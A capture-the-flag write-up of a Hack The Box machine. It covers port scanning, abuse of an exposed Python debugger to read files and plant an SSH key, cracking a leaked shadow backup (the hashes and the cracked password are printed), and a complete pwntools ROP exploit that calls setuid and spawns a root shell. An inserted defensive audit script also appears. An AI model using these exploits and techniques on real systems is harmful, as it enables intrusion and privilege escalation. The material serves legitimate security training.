Basic information

Port scan

Ports 22 and 80 are open:

$ nmap -sC -sV 10.10.10.139

Starting Nmap 7.92 ( https://nmap.org ) at 2021-09-08 14:22 CST
Nmap scan report for 10.10.10.139
Host is up (0.070s latency).
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA)
| 256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA)
|_ 256 a5:a9:95:f5:4a:f4:ae:f8:b6:37:92:b8:9a:2a:b4:66 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
| http-title: Ellingson Mineral Corp
|_Requested resource was http://10.10.10.139/index
|_http-server-header: nginx/1.14.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 61.28 seconds

80

The site shows a few news items that serve as hints later on:

Triggering an error on any page reveals the Python debugger:

shell

The debugger allows executing Python code, but not obtaining a shell directly; it can be used to browse and read files. The private key that can be read is passphrase-protected, but a public key can be appended to authorized_keys, after which SSH login works:

import os  # the debug console needs os imported before these calls work

os.listdir('/home')
os.listdir('/home/hal/')
os.listdir('/home/hal/.ssh')
# the private key is readable but passphrase-protected
with open('/home/hal/.ssh/id_rsa','r') as f: f.read()
# append a public key (placeholder kept from the original) so SSH login as hal works
with open('/home/hal/.ssh/authorized_keys','a') as f: f.write('\nssh-rsa xxxxxx')

Information

The hal user is in the adm group and can read logs and similar files (in both the official walkthrough and ippsec's, adm can read the backup; this is probably a machine-setup issue: 0xdf's blog notes that the box only becomes vulnerable after a reset, because the cron job makes the backup once a day):

Build a small wordlist from the hints and crack margo's password (running rockyou straight through also works):

grep -i -e love -e secret -e sex -e god /usr/share/wordlists/rockyou.txt > grepped_rockyou 

sudo john --wordlist=grepped_rockyou hash.txt

$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:iamgod$08

shadow.bak

...
theplague:$6$.5ef7Dajxto8Lz3u$Si5BDZZ81UxRCWEJbbQH9mBCdnuptj/aG6mqeu9UfeeSY7Ot9gp2wbQLTAJaahnlTrxN613L6Vner4tO1W.ot/:17964:0:99999:7:::
hal:$6$UYTy.cHj$qGyl.fQ1PlXPllI4rbx6KM.lW6b3CJ.k32JxviVqCC2AJPpmybhsA8zPRf0/i92BTpOKtrWcqsFAcdSxEkee30:17964:0:99999:7:::
margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::
duke:$6$bFjry0BT$OtPFpMfL/KuUZOafZalqHINNX/acVeIDiXXCPo9dPi1YHOp9AAAAnFTfEh.2AheGIvXMGMnEFl5DlTAbIzwYc/:17964:0:99999:7:::

user flag

Log in as margo to get user.txt:

Privilege escalation information

The SUID search turns up a binary named garbage:
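
Both footholds on this box come down to host misconfigurations: a shadow backup that the adm group can read, and a non-standard setuid-root binary. The audit script below is an added example, not code from the original writeup; it flags both conditions from a list of file entries. The gids assumed for adm (4) and shadow (42), the baseline set of setuid binaries, and the sample entries are all constructed assumptions.

```python
import os
import stat
from collections import namedtuple

# Assumed: adm is gid 4 and shadow is gid 42, the Debian/Ubuntu defaults.
TRUSTED_SHADOW_GIDS = {0, 42}
# Constructed baseline of setuid-root binaries expected on a stock Ubuntu host;
# any other setuid-root regular file is reported for review.
SUID_BASELINE = {"sudo", "su", "passwd", "chsh", "chfn", "gpasswd", "newgrp",
                 "mount", "umount", "fusermount", "pkexec", "ssh-keysign"}

Entry = namedtuple("Entry", "path mode uid gid")  # mode is the full st_mode

def is_shadow_copy(path):
    # shadow, shadow-, shadow.bak, gshadow.bak: all of these carry password hashes
    base = os.path.basename(path)
    return base.rstrip("-").split(".")[0] in ("shadow", "gshadow")

def audit(entries, baseline=SUID_BASELINE, trusted_gids=TRUSTED_SHADOW_GIDS):
    findings = []
    for e in entries:
        if not stat.S_ISREG(e.mode):
            continue
        perms = stat.S_IMODE(e.mode)
        if is_shadow_copy(e.path):
            if perms & stat.S_IROTH:
                findings.append((e.path, "shadow copy is world-readable"))
            elif perms & stat.S_IRGRP and e.gid not in trusted_gids:
                findings.append((e.path, "shadow copy readable by gid %d" % e.gid))
        if perms & stat.S_ISUID and e.uid == 0 and os.path.basename(e.path) not in baseline:
            findings.append((e.path, "setuid-root binary not in baseline"))
    return findings

def scan(roots):
    # Build entries from a live filesystem (needs read access to the given roots).
    entries = []
    for root in roots:
        for dirpath, _, names in os.walk(root):
            for name in names:
                path = os.path.join(dirpath, name)
                st = os.lstat(path)
                entries.append(Entry(path, st.st_mode, st.st_uid, st.st_gid))
    return entries

# Constructed sample mirroring the box: shadow.bak root:adm 0640, garbage setuid root.
SAMPLE = [Entry("/var/backups/shadow.bak", stat.S_IFREG | 0o640, 0, 4),
          Entry("/var/backups/passwd.bak", stat.S_IFREG | 0o644, 0, 0),
          Entry("/usr/bin/garbage", stat.S_IFREG | 0o4755, 0, 0),
          Entry("/usr/bin/sudo", stat.S_IFREG | 0o4755, 0, 0)]
```

On a real host, `audit(scan(["/var/backups", "/usr/bin", "/usr/sbin"]))` returns the same kind of findings; passwd.bak is deliberately not flagged because it carries no hashes.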

garbage & root flag

ROP against a binary with ASLR and NX: leak a function address through puts, compute the libc base, then run the second ROP chain. Exploiting it directly gives up the SUID privilege, so a setuid call has to be added to the chain as well; 0xdf's writeup in the references covers this in detail.

rip offset 136

rop-tool gadget garbage | grep rdi
0x000000000040179b -> pop rdi; ret ;

exp.py

#!/usr/bin/env python

from pwn import *

#context.log_level = "DEBUG"
sshConn = ssh(host='10.10.10.139', user='margo', password='iamgod$08')
garbage = sshConn.process('garbage')

junk = "A" * 136 # offset from pattern
pop_rdi = p64(0x40179b) # rop-tool gadget garbage | grep rdi
puts_plt = p64(0x401050) # objdump -D garbage | grep puts@GLIBC
puts_got = p64(0x404028) # objdump -D garbage | grep puts@GLIBC
main = p64(0x401619) # objdump -D garbage | grep '<main>'

stage_1 = junk + pop_rdi + puts_got + puts_plt + main
garbage.sendline(stage_1)
garbage.recvuntil("access denied.\n")
leaked_puts = u64(garbage.recvline()[:-1].ljust(8, '\x00'))
log.success("Leaked puts address: 0x%x" % leaked_puts)
garbage.recvuntil("Enter access password: ")


# offsets
libc_puts = 0x809c0 # readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " puts@@GLIBC"
libc_exec_sh = 0x4f322 # one_gadget gadget garbage
libc_setuid = 0xe5970 # readelf -s libs/libc6_2.27-3ubuntu1_amd64/libc.so.6 | grep " setuid@@GLIBC"
libc_base = leaked_puts - libc_puts

stage_2 = junk + pop_rdi + p64(0) + p64(libc_setuid + libc_base) + p64(libc_exec_sh + libc_base)
garbage.sendline(stage_2)
garbage.recvuntil("access denied.")
garbage.interactive()

References